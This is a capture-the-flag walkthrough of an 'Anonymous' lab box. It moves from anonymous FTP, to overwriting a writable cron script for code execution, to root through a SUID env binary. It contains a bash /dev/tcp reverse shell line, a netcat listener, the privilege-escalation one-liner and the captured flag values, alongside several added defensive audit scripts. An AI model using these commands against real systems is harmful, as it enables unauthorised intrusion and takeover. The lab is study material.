
Anonymous

Not the hacking group.

November 4, 2025 July 22, 2025 Medium
Author: Hung Nguyen Tuong

Initial Reconnaissance

Service Scanning

$ sudo nmap -sS -sV -sC -T4 -vv 10.10.66.86

PORT    STATE SERVICE     REASON         VERSION
21/tcp  open  ftp         syn-ack ttl 60 vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts [NSE: writeable]
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.17.21.52
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp  open  ssh         syn-ack ttl 60 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDCi47ePYjDctfwgAphABwT1jpPkKajXoLvf3bb/zvpvDvXwWKnm6nZuzL2HA1veSQa90ydSSpg8S+B8SLpkFycv7iSy2/Jmf7qY+8oQxWThH1fwBMIO5g/TTtRRta6IPoKaMCle8hnp5pSP5D4saCpSW3E5rKd8qj3oAj6S8TWgE9cBNJbMRtVu1+sKjUy/7ymikcPGAjRSSaFDroF9fmGDQtd61oU5waKqurhZpre70UfOkZGWt6954rwbXthTeEjf+4J5+gIPDLcKzVO7BxkuJgTqk4lE9ZU/5INBXGpgI5r4mZknbEPJKS47XaOvkqm9QWveoOSQgkqdhIPjnhD
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPjHnAlR7sBuoSM2X5sATLllsFrcUNpTS87qXzhMD99aGGzyOlnWmjHGNmm34cWSzOohxhoK2fv9NWwcIQ5A/ng=
|   256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDHIuFL9AdcmaAIY7u+aJil1covB44FA632BSQ7sUqap
139/tcp open  netbios-ssn syn-ack ttl 60 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 60 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1s, deviation: 1s, median: 0s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 64425/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 51088/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 18791/udp): CLEAN (Failed to receive data)
|   Check 4 (port 13356/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   ANONYMOUS<00>        Flags: <unique><active>
|   ANONYMOUS<03>        Flags: <unique><active>
|   ANONYMOUS<20>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: anonymous
|   NetBIOS computer name: ANONYMOUS\x00
|   Domain name: \x00
|   FQDN: anonymous
|_  System time: 2025-07-22T02:05:44+00:00
| smb2-time:
|   date: 2025-07-22T02:05:43
|_  start_date: N/A
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

FTP 21

Based on the Nmap results, we know that the FTP server accepts an anonymous login as user ftp with no password. More importantly, the scripts directory on the FTP server has full permissions, so we can read, write, and modify files in it.
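The ftp-anon output above is exactly the combination a vsftpd configuration audit should catch: anonymous logins enabled together with write access for the anonymous account. The following checker is an added example for this writeup, not code from the original post; it parses a vsftpd.conf text and reports that combination. WEAK_CONF and HARDENED_CONF are constructed samples, not the target's real configuration file.

```python
"""Audit a vsftpd configuration for anonymous write access, the condition
the Nmap ftp-anon script reported above. Added example for this writeup;
WEAK_CONF and HARDENED_CONF are constructed samples, not the target's file."""

# Directives that let the anonymous account change the FTP tree when YES
# (each only takes effect together with write_enable=YES).
ANON_WRITE_DIRECTIVES = (
    "anon_upload_enable",
    "anon_mkdir_write_enable",
    "anon_other_write_enable",
)


def parse_vsftpd_conf(text: str) -> dict:
    """Parse key=value lines; blank lines and '#' comments are skipped and
    the last occurrence of a key wins. Keys are normalised to lowercase."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip().lower()] = value.strip()
    return settings


def _is_yes(settings: dict, key: str, default: str) -> bool:
    return settings.get(key, default).strip().upper() == "YES"


def audit_anonymous_access(text: str) -> list:
    """Return findings as strings; an empty list means anonymous users are
    either refused or confined to read-only access."""
    s = parse_vsftpd_conf(text)
    # vsftpd's compiled-in default for anonymous_enable is YES, so a config
    # that never mentions the directive still accepts anonymous logins.
    if not _is_yes(s, "anonymous_enable", "YES"):
        return []
    findings = ["anonymous_enable=YES: unauthenticated logins as 'ftp' are accepted"]
    if _is_yes(s, "write_enable", "NO"):
        for key in ANON_WRITE_DIRECTIVES:
            if _is_yes(s, key, "NO"):
                findings.append(
                    f"write_enable=YES with {key}=YES: anonymous users can modify the FTP tree"
                )
    return findings


WEAK_CONF = """\
# constructed sample matching what the scan observed: anonymous login plus a writable tree
listen=YES
anonymous_enable=YES
anon_root=/var/ftp
write_enable=YES
anon_upload_enable=YES
anon_other_write_enable=YES
"""

HARDENED_CONF = """\
# constructed sample: anonymous access off, writes only for local accounts
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
chroot_local_user=YES
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_anonymous_access(conf) or ["no anonymous-access findings"])
```

Point it at /etc/vsftpd.conf on a host to check; note that an empty or minimal file still yields the anonymous_enable finding, because the daemon's default for that directive is YES.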

┌──(hungnt㉿kali)-[~]
└─$ ftp 10.10.66.86
Connected to 10.10.66.86.
220 NamelessOne's FTP Server!
Name (10.10.66.86:hungnt): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||40426|)
150 Here comes the directory listing.
drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||21728|)
150 Here comes the directory listing.
-rwxr-xrwx    1 1000     1000          314 Jun 04  2020 clean.sh
-rw-rw-r--    1 1000     1000         1204 Jul 22 02:10 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12  2020 to_do.txt
226 Directory send OK.

Listing the scripts directory, we find three interesting files: clean.sh, removed_files.log, and to_do.txt. To understand what they do, we download all three and examine their contents.

ftp> get clean.sh
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||13712|)
150 Opening BINARY mode data connection for clean.sh (314 bytes).
100% |****************************************************************************************************************|   314        6.11 MiB/s    00:00 ETA
226 Transfer complete.
314 bytes received in 00:00 (1.31 KiB/s)
ftp> get removed_files.log
local: removed_files.log remote: removed_files.log
229 Entering Extended Passive Mode (|||17238|)
150 Opening BINARY mode data connection for removed_files.log (1204 bytes).
100% |****************************************************************************************************************|  1204        4.25 MiB/s    00:00 ETA
226 Transfer complete.
1204 bytes received in 00:00 (4.96 KiB/s)
ftp> get to_do.txt
local: to_do.txt remote: to_do.txt
229 Entering Extended Passive Mode (|||15895|)
150 Opening BINARY mode data connection for to_do.txt (68 bytes).
100% |****************************************************************************************************************|    68        1.32 KiB/s    00:00 ETA
226 Transfer complete.
68 bytes received in 00:00 (0.23 KiB/s)
ftp> exit
221 Goodbye.
┌──(hungnt㉿kali)-[~]
└─$ cat clean.sh
#!/bin/bash

tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
        echo "Running cleanup script:  nothing to delete" >> /var/ftp/scripts/removed_files.log
else
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi

┌──(hungnt㉿kali)-[~]
└─$ cat removed_files.log
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete

┌──(hungnt㉿kali)-[~]
└─$ cat to_do.txt
I really need to disable the anonymous login...it's really not safe

The notable point is that clean.sh can be overwritten and edited directly over FTP. Analysing it, we see that the script appears to run periodically on the target: it appends the string "Running cleanup script: nothing to delete" to removed_files.log every time it executes. That opens the possibility of injecting arbitrary commands into clean.sh, which would then run automatically on the target.
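The root cause here is a scheduled script whose file and parent directory are writable by an untrusted account (-rwxr-xrwx clean.sh inside drwxrwxrwx scripts). The following audit routine is an added example, not code from the original writeup: given the path of a script that cron or a timer executes, it walks the file and every ancestor directory and reports each point where another user could edit or replace it. build_demo_layout is a constructed fixture that reproduces the permissions from the listing above; the remediation it implies is the usual chmod 755 on the script and removing world-write from the directory.

```python
"""Audit a script that a scheduler (cron, a systemd timer) runs: flag every
point in its path that an unprivileged user could write, because whoever can
edit the file, or rename it away through a writable parent directory,
controls what the scheduler executes. Added example for this writeup, not
code from the original post."""
import os
import stat
import sys
import tempfile
from pathlib import Path


def _component_findings(p: Path, st: os.stat_result) -> list:
    """Findings for a single path component (the file or one ancestor)."""
    mode = st.st_mode
    kind = "directory" if stat.S_ISDIR(mode) else "file"
    findings = []
    if mode & stat.S_IWOTH:
        findings.append(f"{p}: {kind} is world-writable ({stat.filemode(mode)})")
        # Without the sticky bit anyone may rename or delete entries, so the
        # script can be swapped wholesale even if the file itself is 755.
        if stat.S_ISDIR(mode) and not (mode & stat.S_ISVTX):
            findings.append(f"{p}: world-writable directory lacks the sticky bit, entries can be replaced")
    elif (mode & stat.S_IWGRP) and st.st_gid != 0:
        # Group root is treated as trusted; any other writable group is reported.
        findings.append(f"{p}: {kind} is group-writable by gid {st.st_gid} ({stat.filemode(mode)})")
    return findings


def audit_scheduled_script(script: str) -> list:
    """Return findings for the script and every ancestor directory up to '/'.
    Symlinks are resolved first; an empty list means no writable point."""
    p = Path(script).resolve()
    if not p.is_file():
        return [f"{p}: not a regular file"]
    findings = []
    for component in (p, *p.parents):
        findings.extend(_component_findings(component, component.stat()))
    return findings


def build_demo_layout(weak: bool) -> tuple:
    """Constructed fixture: returns (directory, script). weak=True reproduces
    drwxrwxrwx scripts/ and -rwxr-xrwx clean.sh; weak=False is the fixed layout."""
    base = os.path.realpath(tempfile.mkdtemp())
    script = os.path.join(base, "clean.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\n")
    os.chmod(script, 0o757 if weak else 0o755)
    os.chmod(base, 0o777 if weak else 0o755)
    return base, script


if __name__ == "__main__":
    targets = sys.argv[1:] or [build_demo_layout(weak=True)[1]]
    for target in targets:
        for finding in audit_scheduled_script(target) or [f"{target}: no writable point found"]:
            print(finding)
```

Run it with the paths of every script referenced from /etc/crontab, /etc/cron.d and user crontabs; a finding on an ancestor such as /tmp (world-writable but sticky) is informational, while a finding on the script itself or on a non-sticky world-writable directory is the condition exploited in this room.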

To test this hypothesis, we insert a simple echo line as a marker:

┌──(hungnt㉿kali)-[~]
└─$ cat clean.sh
#!/bin/bash

tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
        echo "Hacker was here!!!" >> /var/ftp/scripts/removed_files.log
else
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi

We then upload the modified clean.sh back to the FTP server.

ftp> put clean.sh
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||63324|)
150 Ok to send data.
100% |****************************************************************************************************************|   290        5.88 MiB/s    00:00 ETA
226 Transfer complete.
290 bytes sent in 00:00 (0.60 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||12882|)
150 Here comes the directory listing.
-rwxr-xrwx    1 1000     1000          290 Jul 22 02:40 clean.sh
-rw-rw-r--    1 1000     1000         2494 Jul 22 02:40 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12  2020 to_do.txt
226 Directory send OK.
ftp> ls
229 Entering Extended Passive Mode (|||34342|)
150 Here comes the directory listing.
-rwxr-xrwx    1 1000     1000          290 Jul 22 02:40 clean.sh
-rw-rw-r--    1 1000     1000         2513 Jul 22 02:41 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12  2020 to_do.txt
226 Directory send OK.
ftp> get removed_files.log
local: removed_files.log remote: removed_files.log
229 Entering Extended Passive Mode (|||53522|)
150 Opening BINARY mode data connection for removed_files.log (2513 bytes).
100% |****************************************************************************************************************|  2513       46.99 MiB/s    00:00 ETA
226 Transfer complete.
2513 bytes received in 00:00 (10.31 KiB/s)

After waiting a while, we download removed_files.log from the target again and check its contents. Sure enough, the line "Hacker was here!!!" appears in the log, confirming that our code was executed remotely.

┌──(hungnt㉿kali)-[~]
└─$ cat removed_files.log
Running cleanup script:  nothing to delete
...
Running cleanup script:  nothing to delete
Hacker was here!!!

We have therefore achieved Remote Code Execution (RCE) on the target by abusing the clean.sh file.
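From the defender's side, the log itself is the detection opportunity: the original clean.sh can only ever write two line shapes to removed_files.log, so any other line is evidence that the script was altered or the log was written by something else. The following detector is an added example, not part of the original writeup; SAMPLE_LOG is a constructed log that mixes legitimate entries with the marker line the writeup planted.

```python
"""Flag lines in removed_files.log that the original clean.sh could not have
written. Added example for this writeup; SAMPLE_LOG is constructed."""
import re

# The two shapes clean.sh writes: the fixed no-op message (note the double
# space after the colon) and "<output of date> | Removed file /tmp/<name>".
# `date` pads a single-digit day with a space, hence " {1,2}\d{1,2}".
EXPECTED_SHAPES = (
    re.compile(r"^Running cleanup script:  nothing to delete$"),
    re.compile(r"^\w{3} \w{3} {1,2}\d{1,2} \d{2}:\d{2}:\d{2} \S+ \d{4} \| Removed file /tmp/\S+$"),
)


def find_unexpected_lines(log_text: str) -> list:
    """Return (line_number, line) for every non-empty line matching neither
    expected shape. Matching is exact on purpose: a stray space or a changed
    message text is itself a sign the script differs from the known version."""
    anomalies = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        if not any(shape.match(line) for shape in EXPECTED_SHAPES):
            anomalies.append((number, line))
    return anomalies


SAMPLE_LOG = """\
Running cleanup script:  nothing to delete
Running cleanup script:  nothing to delete
Tue Jul 22 02:10:01 UTC 2025 | Removed file /tmp/cache.tmp
Running cleanup script:  nothing to delete
Hacker was here!!!
Running cleanup script:  nothing to delete
"""

if __name__ == "__main__":
    for number, line in find_unexpected_lines(SAMPLE_LOG):
        print(f"line {number}: unexpected entry: {line!r}")
```

On a real host this would run over the live file on a schedule shorter than the cleanup job's own interval, alongside a hash check of clean.sh against the version deployed from configuration management; the log check catches the consequence, the hash check catches the cause.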

Shell as namelessone

Next, we set up a reverse shell connection.

┌──(hungnt㉿kali)-[~]
└─$ cat clean.sh
#!/bin/bash
sh -i >& /dev/tcp/10.17.21.52/4242 0>&1

ftp> put clean.sh
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||46377|)
150 Ok to send data.
100% |****************************************************************************************************************|    52      570.57 KiB/s    00:00 ETA
226 Transfer complete.
52 bytes sent in 00:00 (0.10 KiB/s)
┌──(hungnt㉿kali)-[~]
└─$ rlwrap -cAr nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.17.21.52] from (UNKNOWN) [10.10.66.86] 59918
sh: 0: can't access tty; job control turned off
$ id
uid=1000(namelessone) gid=1000(namelessone) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

Once the connection comes back, we have access to the target as user namelessone.

user.txt

$ cd ~
$ ls -la
total 60
drwxr-xr-x 6 namelessone namelessone 4096 May 14  2020 .
drwxr-xr-x 3 root        root        4096 May 11  2020 ..
lrwxrwxrwx 1 root        root           9 May 11  2020 .bash_history -> /dev/null
-rw-r--r-- 1 namelessone namelessone  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 namelessone namelessone 3771 Apr  4  2018 .bashrc
drwx------ 2 namelessone namelessone 4096 May 11  2020 .cache
drwx------ 3 namelessone namelessone 4096 May 11  2020 .gnupg
-rw------- 1 namelessone namelessone   36 May 12  2020 .lesshst
drwxrwxr-x 3 namelessone namelessone 4096 May 12  2020 .local
drwxr-xr-x 2 namelessone namelessone 4096 May 17  2020 pics
-rw-r--r-- 1 namelessone namelessone  807 Apr  4  2018 .profile
-rw-rw-r-- 1 namelessone namelessone   66 May 12  2020 .selected_editor
-rw-r--r-- 1 namelessone namelessone    0 May 12  2020 .sudo_as_admin_successful
-rw-r--r-- 1 namelessone namelessone   33 May 11  2020 user.txt
-rw------- 1 namelessone namelessone 7994 May 12  2020 .viminfo
-rw-rw-r-- 1 namelessone namelessone  215 May 13  2020 .wget-hsts
$ cat user.txt
90d6f992585815ff991e68748c414740

LinPEAS

At this point we transfer LinPEAS to the target and start enumerating privilege escalation vectors.

[Image: LinPEAS output]

We find that the env binary has the SUID bit set. This matters because a SUID env lets us escalate privileges, following the technique documented here.
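A SUID bit on env is not something a stock install ships with, so a baseline comparison would have flagged it long before LinPEAS did. The following auditor is an added example, not code from the original writeup or from LinPEAS: it enumerates setuid/setgid regular files under the given roots and reports the setuid ones absent from a known-good list. BASELINE_SETUID is a constructed, abbreviated approximation of what a stock Ubuntu 18.04 install carries and must be replaced by a list recorded from a trusted image; build_demo_tree is a constructed fixture.

```python
"""Enumerate setuid/setgid executables and report the setuid ones that a
known-good baseline does not list. Added example for this writeup; the
baseline is constructed and must be recorded from a trusted image in practice."""
import os
import stat
import tempfile

# Constructed, abbreviated baseline of binaries that legitimately carry setuid
# on a stock Ubuntu 18.04 host. /usr/bin/env is deliberately not in it.
BASELINE_SETUID = frozenset({
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/fusermount",
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/pkexec",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
})


def find_special_bits(roots) -> dict:
    """Walk the given roots without following symlinks and map each regular
    file carrying setuid and/or setgid to the bits it carries."""
    found = {}
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue  # unreadable or vanished entry; skip it
                if not stat.S_ISREG(st.st_mode):
                    continue
                bits = []
                if st.st_mode & stat.S_ISUID:
                    bits.append("setuid")
                if st.st_mode & stat.S_ISGID:
                    bits.append("setgid")
                if bits:
                    found[path] = "+".join(bits)
    return found


def unexpected_setuid(found: dict, baseline=BASELINE_SETUID) -> list:
    """Sorted setuid paths missing from the baseline: each needs a documented
    justification or `chmod u-s`."""
    return sorted(p for p, bits in found.items() if "setuid" in bits and p not in baseline)


def build_demo_tree() -> tuple:
    """Constructed fixture: a temporary tree with a setuid 'env' and a plain
    'true'. Returns (base, setuid_path, plain_path)."""
    base = tempfile.mkdtemp()
    bindir = os.path.join(base, "usr", "bin")
    os.makedirs(bindir)
    paths = {}
    for name, mode in (("env", 0o4755), ("true", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
        paths[name] = path
    return base, paths["env"], paths["true"]


if __name__ == "__main__":
    base, _, _ = build_demo_tree()
    found = find_special_bits([base])
    for path in unexpected_setuid(found):
        print(f"unexpected setuid binary: {path}")
```

Against a live host the roots would be /bin, /sbin, /usr and /opt, and the script would run from a trusted cron entry with its output shipped off-box; the fixture exists only so the example runs anywhere.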

Shell as root

namelessone@anonymous:/tmp$ which env
which env
/usr/bin/env
namelessone@anonymous:/tmp$ /usr/bin/env /bin/sh -p
/usr/bin/env /bin/sh -p
## id
id
uid=1000(namelessone) gid=1000(namelessone) euid=0(root) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

We have successfully obtained root.

root.txt

## ls -la /root
ls -la /root
total 60
drwx------  6 root root  4096 May 17  2020 .
drwxr-xr-x 24 root root  4096 May 12  2020 ..
lrwxrwxrwx  1 root root     9 May 11  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  3106 Apr  9  2018 .bashrc
drwx------  2 root root  4096 May 11  2020 .cache
drwx------  3 root root  4096 May 11  2020 .gnupg
drwxr-xr-x  3 root root  4096 May 11  2020 .local
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
-rw-r--r--  1 root root    33 May 11  2020 root.txt
-rw-r--r--  1 root root    66 May 11  2020 .selected_editor
drwx------  2 root root  4096 May 11  2020 .ssh
-rw-------  1 root root 13795 May 17  2020 .viminfo
-rw-------  1 root root    55 May 14  2020 .Xauthority
## cat /root/root.txt
cat /root/root.txt
4d930091c31a622a7ed10f27999af363